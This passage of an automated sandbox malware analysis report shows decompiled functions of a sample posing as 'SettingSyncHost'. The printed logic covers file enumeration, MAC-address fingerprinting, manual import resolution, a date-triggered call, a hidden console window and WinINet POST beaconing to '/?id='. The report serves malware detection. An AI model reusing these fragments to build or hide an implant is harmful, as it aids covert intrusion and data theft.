                                                                                                                                      Function 003CCEB0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 276fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 681 3cceb0-3ccf31 682 3cd2de call 3ca560 681->682 683 3ccf37-3ccf3b 681->683 688 3cd2e3-3cd2e8 call 3de23f 682->688 684 3ccf3d 683->684 685 3ccf3f-3ccf89 call 3d0e10 FindFirstFileA 683->685 684->685 691 3ccf8f-3ccfa1 FindNextFileA 685->691 692 3cd248-3cd27b FindClose 685->692 694 3ccfa7 691->694 695 3cd242 691->695 696 3cd27d-3cd289 692->696 697 3cd2a5-3cd2db call 3cd380 call 3d8ec4 692->697 699 3ccfb0-3ccfcb 694->699 695->692 700 3cd29b-3cd2a2 call 3d8f05 696->700 701 3cd28b-3cd299 696->701 704 3ccfd0-3ccfd5 699->704 700->697 701->688 701->700 704->704 707 3ccfd7-3cd000 call 3cefd0 704->707 711 3cd016-3cd08d call 3db630 call 3cdcc0 call 3cde60 707->711 712 3cd002-3cd010 707->712 726 3cd08f-3cd099 711->726 727 3cd0b5-3cd0b8 711->727 712->711 713 3cd1fe-3cd205 712->713 715 3cd207-3cd210 713->715 716 3cd230-3cd23c FindNextFileA 713->716 718 3cd226-3cd22d call 3d8f05 715->718 719 3cd212-3cd220 715->719 716->695 716->699 718->716 719->688 719->718 726->727 728 3cd09b-3cd0b3 726->728 729 3cd0ba-3cd0c4 727->729 730 3cd0e7-3cd153 call 3cab90 727->730 731 3cd0db-3cd0e2 call 3cefd0 728->731 729->730 732 3cd0c6-3cd0da 729->732 736 3cd155-3cd1c4 730->736 737 3cd1c6-3cd1d1 call 3d0420 730->737 731->730 732->731 738 3cd1d6-3cd1f8 call 3cce20 call 3cbec0 736->738 737->738 738->713
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,?,?,0040466C,00000002,982F9315,?,?), ref: 003CCF78
                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,?), ref: 003CCF9D
                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,00000000,?,?,?,?), ref: 003CD238
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 003CD249
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$Next$CloseFirst
                                                                                                                                      • String ID: 0
                                                                                                                                      • API String ID: 1884811643-4108050209
                                                                                                                                      • Opcode ID: 79d7a1110da8d485df9beda60bb029e976696097f2e6289b5b5aa1efcc374848
                                                                                                                                      • Instruction ID: e19d480730010eb722d05f0fc23bff23862dff0c63a2c9391a0f83a2c4ae4686
                                                                                                                                      • Opcode Fuzzy Hash: 79d7a1110da8d485df9beda60bb029e976696097f2e6289b5b5aa1efcc374848
                                                                                                                                      • Instruction Fuzzy Hash: 28C19C71D012199FEB25DF54C949BAEBBB5EF44304F1082DCE408AB291DB75AE85CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003CBB10, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 995 3cbb10-3cbbb5 call 3db630 call 3cdcc0 call 3df7d5 1002 3cbbb7-3cbbde call 3cefd0 995->1002 1003 3cbbe3-3cbbf4 GetAdaptersInfo 995->1003 1011 3cbcfd-3cbd17 call 3cd2f0 1002->1011 1004 3cbbf6-3cbc14 call 3df6c0 call 3df7d5 1003->1004 1005 3cbc42-3cbc52 GetAdaptersInfo 1003->1005 1004->1005 1023 3cbc16-3cbc3d call 3cefd0 1004->1023 1008 3cbcdc-3cbcf5 call 3df6c0 1005->1008 1009 3cbc58-3cbc66 call 3df7d5 1005->1009 1008->1011 1021 3cbccc-3cbcce 1009->1021 1022 3cbc68-3cbcaf call 3cb050 1009->1022 1025 3cbd19 1011->1025 1026 3cbd1b-3cbd66 call 3d0f30 call 3d01b0 call 3d0f30 1011->1026 1021->1009 1024 3cbcd0-3cbcd6 1021->1024 1031 3cbcb0-3cbcb5 1022->1031 1023->1011 1024->1008 1025->1026 1043 3cbd68-3cbd77 1026->1043 1044 3cbd97-3cbdbf 1026->1044 1031->1031 1034 3cbcb7-3cbcc9 call 3cefd0 call 3df6c0 1031->1034 1034->1021 1045 3cbd8d-3cbd94 call 3d8f05 1043->1045 1046 3cbd79-3cbd87 1043->1046 1047 3cbdf0-3cbe33 1044->1047 1048 3cbdc1-3cbdd0 1044->1048 1045->1044 1046->1045 1051 3cbeb4-3cbeb9 call 3de23f 1046->1051 1049 3cbe5c-3cbe5f 1047->1049 1050 3cbe35-3cbe3f 1047->1050 1053 3cbde6-3cbded call 3d8f05 1048->1053 1054 3cbdd2-3cbde0 1048->1054 1056 3cbe8a-3cbeb1 call 3cbec0 call 3d8ec4 1049->1056 1057 3cbe61-3cbe6b 1049->1057 1050->1049 1055 3cbe41-3cbe5a 1050->1055 1053->1047 1054->1051 1054->1053 1063 3cbe83-3cbe85 call 3cefd0 1055->1063 1057->1056 1064 3cbe6d-3cbe82 1057->1064 1063->1056 1064->1063
                                                                                                                                      APIs
                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 003CBBEB
                                                                                                                                      Strings
                                                                                                                                      • %02X%02X%02X%02X%02X%02X, xrefs: 003CBC98
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdaptersInfo
                                                                                                                                      • String ID: %02X%02X%02X%02X%02X%02X
                                                                                                                                      • API String ID: 3177971545-722279150
                                                                                                                                      • Opcode ID: a6dbce6d891f6d66d06c85a229988100ad8a128af1d7076d38095ab8ce030666
                                                                                                                                      • Instruction ID: 644b6c77c11a1009c63e477251d8f7aa162cd09654b67f74022a9c58302f72d7
                                                                                                                                      • Opcode Fuzzy Hash: a6dbce6d891f6d66d06c85a229988100ad8a128af1d7076d38095ab8ce030666
                                                                                                                                      • Instruction Fuzzy Hash: BAA1F1719002699FDB26DF64CD46FEEBBB5AF45300F0081E9E509AB281DB749E84CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00391070, Relevance: 4.6, APIs: 3, Instructions: 103libraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1153 391070-3910af 1154 3910b1 1153->1154 1155 3910b6-3910bd 1153->1155 1156 391191-3911a4 call 3931a1 1154->1156 1155->1156 1157 3910c3-3910d7 LoadLibraryA call 3931a1 1155->1157 1161 3910dc-3910e3 1157->1161 1162 3910ea-391107 1161->1162 1163 3910e5 1161->1163 1164 391109-39110c 1162->1164 1165 39110f-391115 1162->1165 1163->1156 1164->1165 1166 391183-39118c 1165->1166 1167 391117-391122 1165->1167 1166->1155 1168 39114a-39116d GetProcAddress call 3931a1 1167->1168 1169 391124-391148 GetProcAddress call 3931a1 1167->1169 1174 39116f-391181 1168->1174 1169->1174 1174->1165
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E00391070(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v12;
				signed int* _v24;
				intOrPtr _v48;
				intOrPtr* _v60;
				struct HINSTANCE__* _v72;
				void _v268;
				struct HINSTANCE__* _t55;
				_Unknown_base(*)()* _t65;
				_Unknown_base(*)()* _t72;
				void* _t105;
				void* _t106;
				void* _t107;

				memset( &_v268, 0xcccccccc, 0x42 << 2);
				_t107 = _t106 + 0xc;
				_t5 = _a4 + 0x3c; // 0x3ca104c4
				_v48 = _a4 +  *_t5;
				_v60 = _a4 +  *((intOrPtr*)(_v48 + 0x80));
				_t52 = _v60;
				if(_v60 != _a4) {
					while(1) {
						_t52 = _v60;
						__eflags =  *(_v60 + 0xc);
						if(__eflags == 0) {
							break;
						}
						_t55 = LoadLibraryA(_a4 +  *(_v60 + 0xc)); // executed
						__eflags = _t107 - _t107;
						_v72 = E003931A1(_t55, _t107 - _t107);
						__eflags = _v72;
						if(__eflags != 0) {
							_v12 = _a4 +  *((intOrPtr*)(_v60 + 0x10));
							_v24 = _a4 +  *_v60;
							__eflags = _v24 - _a4;
							if(_v24 == _a4) {
								_v24 = _v12;
							}
							while(1) {
								__eflags =  *_v24;
								if( *_v24 == 0) {
									break;
								}
								__eflags =  *_v24 & 0x80000000;
								if(( *_v24 & 0x80000000) == 0) {
									_t65 = GetProcAddress(_v72, _a4 +  *_v24 + 2);
									__eflags = _t107 - _t107;
									 *_v12 = E003931A1(_t65, _t107 - _t107);
								} else {
									_t72 = GetProcAddress(_v72,  *_v24 & 0x0000ffff);
									__eflags = _t107 - _t107;
									 *_v12 = E003931A1(_t72, _t107 - _t107);
								}
								_v12 = _v12 + 4;
								_v24 =  &(_v24[1]);
							}
							_v60 = _v60 + 0x14;
							continue;
						}
						break;
					}
					L13:
					return E003931A1(_t52, _t105 - _t107 + 0x108);
				}
				goto L13;
			}















                                                                                                                                      0x0039108c
                                                                                                                                      0x0039108c
                                                                                                                                      0x00391094
                                                                                                                                      0x00391097
                                                                                                                                      0x003910a6
                                                                                                                                      0x003910a9
                                                                                                                                      0x003910af
                                                                                                                                      0x003910b6
                                                                                                                                      0x003910b6
                                                                                                                                      0x003910b9
                                                                                                                                      0x003910bd
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x003910cf
                                                                                                                                      0x003910d5
                                                                                                                                      0x003910dc
                                                                                                                                      0x003910df
                                                                                                                                      0x003910e3
                                                                                                                                      0x003910f3
                                                                                                                                      0x003910fe
                                                                                                                                      0x00391104
                                                                                                                                      0x00391107
                                                                                                                                      0x0039110c
                                                                                                                                      0x0039110c
                                                                                                                                      0x0039110f
                                                                                                                                      0x00391112
                                                                                                                                      0x00391115
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039111c
                                                                                                                                      0x00391122
                                                                                                                                      0x0039115d
                                                                                                                                      0x00391163
                                                                                                                                      0x0039116d
                                                                                                                                      0x00391124
                                                                                                                                      0x00391136
                                                                                                                                      0x0039113c
                                                                                                                                      0x00391146
                                                                                                                                      0x00391146
                                                                                                                                      0x00391175
                                                                                                                                      0x0039117e
                                                                                                                                      0x0039117e
                                                                                                                                      0x00391189
                                                                                                                                      0x00000000
                                                                                                                                      0x00391189
                                                                                                                                      0x00000000
                                                                                                                                      0x003910e5
                                                                                                                                      0x00391194
                                                                                                                                      0x003911a4
                                                                                                                                      0x003911a4
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE(00000000), ref: 003910CF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 5501065f3921b8d63ddccf679148ada937219600c59cf382b77989fde1c2a44e
                                                                                                                                      • Instruction ID: 0eea967be51351b02126a642020e5304163913cee788d539594c170f4d5989ba
                                                                                                                                      • Opcode Fuzzy Hash: 5501065f3921b8d63ddccf679148ada937219600c59cf382b77989fde1c2a44e
                                                                                                                                      • Instruction Fuzzy Hash: 7A412C74A0020AEFDF15DF98D890AADBBB2FF48355F154068E946BB351C730AE80CB95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003930E0, Relevance: 3.0, APIs: 2, Instructions: 43timeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1207 3930e0-393124 GetLocalTime call 3931a1 1210 39312b-39315b call 3931c4 call 393c21 call 3931a1 1207->1210 1211 393126 call 391014 1207->1211 1211->1210
                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                      			E003930E0(intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				struct _SYSTEMTIME _v28;
				char _v224;
				signed int _t9;
				intOrPtr _t16;
				void* _t26;
				intOrPtr _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t35;

				_t26 = __edx;
				_t20 = __ebx;
				_t30 =  &_v224;
				memset(_t30, 0xcccccccc, 0x37 << 2);
				_t36 = _t35 + 0xc;
				_t31 = _t30 + 0x37;
				_t9 =  *0x3c7040; // 0xbb40e64e
				_v8 = _t9 ^ _t34;
				_t33 = _t35 + 0xc;
				GetLocalTime( &_v28);
				E003931A1( &_v28, _t35 + 0xc - _t36);
				if((_v28.wYear & 0x0000ffff) == 0x7e5) {
					L00391014(__ebx, _t26, _t31, _t33); // executed
				}
				_push(0);
				E003931C4(0x39315c);
				_pop(_t16);
				_t28 = _t26;
				return E003931A1(E00393C21(_t16, _t20, _v8 ^ _t34, _t28, _t31, _t33), _t34 - _t36 + 0xdc);
			}














                                                                                                                                      0x003930e0
                                                                                                                                      0x003930e0
                                                                                                                                      0x003930ec
                                                                                                                                      0x003930fc
                                                                                                                                      0x003930fc
                                                                                                                                      0x003930fc
                                                                                                                                      0x003930fe
                                                                                                                                      0x00393105
                                                                                                                                      0x00393108
                                                                                                                                      0x0039310e
                                                                                                                                      0x00393116
                                                                                                                                      0x00393124
                                                                                                                                      0x00393126
                                                                                                                                      0x00393126
                                                                                                                                      0x00393130
                                                                                                                                      0x00393137
                                                                                                                                      0x0039313c
                                                                                                                                      0x0039313d
                                                                                                                                      0x0039315b

                                                                                                                                      APIs
                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0039310E
                                                                                                                                      • @_RTC_CheckStackVars@8.LIBCMT ref: 00393137
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckLocalStackTimeVars@8
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1854921025-0
                                                                                                                                      • Opcode ID: 6ffbaed7cb0a24f7afd4c68f7a14e829af79df5c4f66a10494730a3a7758362b
                                                                                                                                      • Instruction ID: fad661834c50d6fd881b0f0c117905922924c5bf0f46468c69878d255d7766c2
                                                                                                                                      • Opcode Fuzzy Hash: 6ffbaed7cb0a24f7afd4c68f7a14e829af79df5c4f66a10494730a3a7758362b
                                                                                                                                      • Instruction Fuzzy Hash: 5FF0A9B2E040085AEB11B7A9EC42ABEB7A9DB84311F510076E909E7251E9255E44C6E1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D9ABA, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00049AC6,003D9359), ref: 003D9ABF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 89f570207f5409718e96a642a08c7cfa43abd59978e3cfb76bfe52bc9c144bcd
                                                                                                                                      • Instruction ID: 10b9c1d8b974ae243b6f899c19d57575df0b8cd37143a0da4592f3242f1a17b7
                                                                                                                                      • Opcode Fuzzy Hash: 89f570207f5409718e96a642a08c7cfa43abd59978e3cfb76bfe52bc9c144bcd
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D6CF0, Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 892networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 3d6cf0-3d6d75 GetConsoleWindow ShowWindow call 3cefd0 call 3d1600 5 3d6d77-3d6d83 0->5 6 3d6da3-3d6dfc call 3db630 0->6 8 3d6d99-3d6da0 call 3d8f05 5->8 9 3d6d85-3d6d93 5->9 14 3d6e00-3d6e05 6->14 8->6 9->8 10 3d7727 call 3de23f 9->10 17 3d772c call 3de23f 10->17 14->14 16 3d6e07-3d6e8a call 3cefd0 * 2 call 3cab90 * 2 14->16 34 3d6e8c-3d6e98 16->34 35 3d6eb8-3d6ec5 16->35 21 3d7731 call 3ca560 17->21 25 3d7736 call 3de23f 21->25 29 3d773b call 3ca560 25->29 32 3d7740 call 3de23f 29->32 39 3d7745-3d78e6 call 3de23f call 3cefd0 * 2 call 3d8ed5 * 4 call 3cab90 call 3d8ed5 call 3d12a0 32->39 37 3d6eae-3d6eb5 call 3d8f05 34->37 38 3d6e9a-3d6ea8 34->38 40 3d6ec7-3d6ed6 35->40 41 3d6ef6-3d6efd 35->41 37->35 38->37 38->39 128 3d78e8-3d78f4 39->128 129 3d7914-3d7933 39->129 44 3d6eec-3d6ef3 call 3d8f05 40->44 45 3d6ed8-3d6ee6 40->45 46 3d6fa5-3d703c call 3d8ed5 call 3cbb10 call 3cab90 call 3ca5a0 41->46 47 3d6f03-3d6f2d InternetOpenA 41->47 44->41 45->39 45->44 86 3d703e-3d704a 46->86 87 3d706a-3d7096 call 3cbf90 46->87 52 3d6f2f-3d6f69 InternetConnectA 47->52 53 3d6f77-3d6f99 GetLastError call 3d01b0 call 3cdfe0 47->53 58 3d6f9e 52->58 59 3d6f6b-3d6f71 InternetCloseHandle 52->59 69 3d763f-3d7645 53->69 58->46 59->53 72 3d7647-3d7653 69->72 73 3d7673-3d768b 69->73 76 3d7669-3d7670 call 3d8f05 72->76 77 3d7655-3d7663 72->77 78 3d768d-3d769c 73->78 79 3d76bc-3d76dd 73->79 76->73 77->39 77->76 83 3d769e-3d76ac 78->83 84 3d76b2-3d76b9 call 3d8f05 78->84 88 3d76df-3d76ee 79->88 89 3d770a-3d7726 call 3d8ec4 79->89 83->39 83->84 84->79 97 3d704c-3d705a 86->97 98 3d7060-3d7067 call 3d8f05 86->98 87->21 108 3d709c-3d70ec call 3d0e10 call 3d35e0 87->108 90 3d7700-3d7707 call 3d8f05 88->90 91 3d76f0-3d76fe 88->91 90->89 91->39 91->90 97->17 97->98 98->87 118 3d710d-3d7128 call 3d09d0 108->118 119 3d70ee-3d70fa 108->119 126 3d712a-3d7175 call 3d79b0 118->126 121 3d70fc 119->121 122 3d70fe-3d710b 119->122 121->122 122->126 135 3d7177-3d7183 126->135 136 3d71a3-3d71ad 126->136 131 3d790a-3d7911 call 3d8f05 128->131 132 3d78f6-3d7904 128->132 133 3d795d-3d7973 129->133 134 3d7935-3d7941 129->134 131->129 132->131 139 3d79a3-3d79a8 call 3de23f 132->139 137 3d7975-3d798d GetLastError call 3d01b0 call 3cdfe0 133->137 138 3d7992-3d79a2 133->138 141 3d7953-3d795a call 3d8f05 134->141 142 3d7943-3d7951 134->142 144 3d7199-3d71a0 call 3d8f05 135->144 145 3d7185-3d7193 135->145 147 3d71af-3d71bb 136->147 148 3d71db-3d71fa 136->148 137->138 141->133 142->139 142->141 144->136 145->25 145->144 156 3d71bd-3d71cb 147->156 157 3d71d1-3d71d8 call 3d8f05 147->157 151 3d71fc-3d720b 148->151 152 3d722b-3d7253 148->152 159 3d720d-3d721b 151->159 160 3d7221-3d7228 call 3d8f05 151->160 161 3d7255-3d7264 152->161 162 3d7284-3d72aa 152->162 156->25 156->157 157->148 159->25 159->160 160->152 167 3d727a-3d727c call 3d8f05 161->167 168 3d7266-3d7274 161->168 162->29 169 3d72b0-3d7338 call 3d0e10 call 3cefd0 call 3d12a0 162->169 174 3d7281 167->174 168->25 168->167 179 3d733d-3d7355 169->179 174->162 180 3d738c-3d738e 179->180 181 3d7357-3d7366 179->181 184 3d73d6-3d7470 call 3cab90 call 3d6a10 call 3cab90 call 3d6ac0 180->184 185 3d7390-3d73b4 GetLastError call 3d01b0 call 3cdfe0 180->185 182 3d737c-3d7389 call 3d8f05 181->182 183 3d7368-3d7376 181->183 182->180 183->32 183->182 211 3d7486-3d748d 184->211 212 3d7472-3d7482 184->212 197 3d73cc-3d73d1 185->197 198 3d73b6-3d73ca InternetCloseHandle * 2 185->198 199 3d74ff-3d7508 197->199 198->197 202 3d7539-3d755d 199->202 203 3d750a-3d7519 199->203 207 3d755f-3d756e 202->207 208 3d758e-3d75af 202->208 205 3d752f-3d7536 call 3d8f05 203->205 206 3d751b-3d7529 203->206 205->202 206->39 206->205 214 3d7584-3d758b call 3d8f05 207->214 215 3d7570-3d757e 207->215 209 3d75dd-3d75e6 208->209 210 3d75b1-3d75bd 208->210 219 3d75e8-3d75f7 209->219 220 3d7617-3d7637 209->220 217 3d75bf-3d75cd 210->217 218 3d75d3-3d75da call 3d8f05 210->218 221 3d748f-3d74a3 InternetCloseHandle * 2 211->221 222 3d74a5-3d74af 211->222 212->211 214->208 215->39 215->214 217->39 217->218 218->209 227 3d760d-3d7614 call 3d8f05 219->227 228 3d75f9-3d7607 219->228 220->69 224 3d7639-3d763b 220->224 221->222 229 3d74cb-3d74d1 222->229 230 3d74b1-3d74c5 222->230 224->69 227->220 228->39 228->227 229->199 231 3d74d3-3d74df 229->231 230->229 235 3d74f5-3d74fc call 3d8f05 231->235 236 3d74e1-3d74ef 231->236 235->199 236->39 236->235
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleWindow.KERNEL32(00000000,982F9315), ref: 003D6D1F
                                                                                                                                      • ShowWindow.USER32(00000000), ref: 003D6D26
                                                                                                                                      • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 003D6F1D
                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000001), ref: 003D6F5B
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D6F71
                                                                                                                                      • GetLastError.KERNEL32 ref: 003D6F77
                                                                                                                                      • GetLastError.KERNEL32(POST,00000004,004044A0,?,/?id=,00000005,?,?,004044A0,00000000,?,00000001,00000000,004048E8,00000001,00000001), ref: 003D7390
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D73C2
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D73CA
                                                                                                                                        • Part of subcall function 003D6A10: __Xtime_get_ticks.LIBCPMT ref: 003D6A32
                                                                                                                                        • Part of subcall function 003D6A10: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6A40
                                                                                                                                        • Part of subcall function 003CAB90: Concurrency::cancel_current_task.LIBCPMT ref: 003CAC49
                                                                                                                                        • Part of subcall function 003D6AC0: __Xtime_get_ticks.LIBCPMT ref: 003D6AF3
                                                                                                                                        • Part of subcall function 003D6AC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B01
                                                                                                                                        • Part of subcall function 003D6AC0: __Xtime_get_ticks.LIBCPMT ref: 003D6B1B
                                                                                                                                        • Part of subcall function 003D6AC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B29
                                                                                                                                        • Part of subcall function 003D6AC0: __Xtime_get_ticks.LIBCPMT ref: 003D6B4B
                                                                                                                                        • Part of subcall function 003D6AC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B59
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D749B
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D74A3
                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,982F9315), ref: 003D7975
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
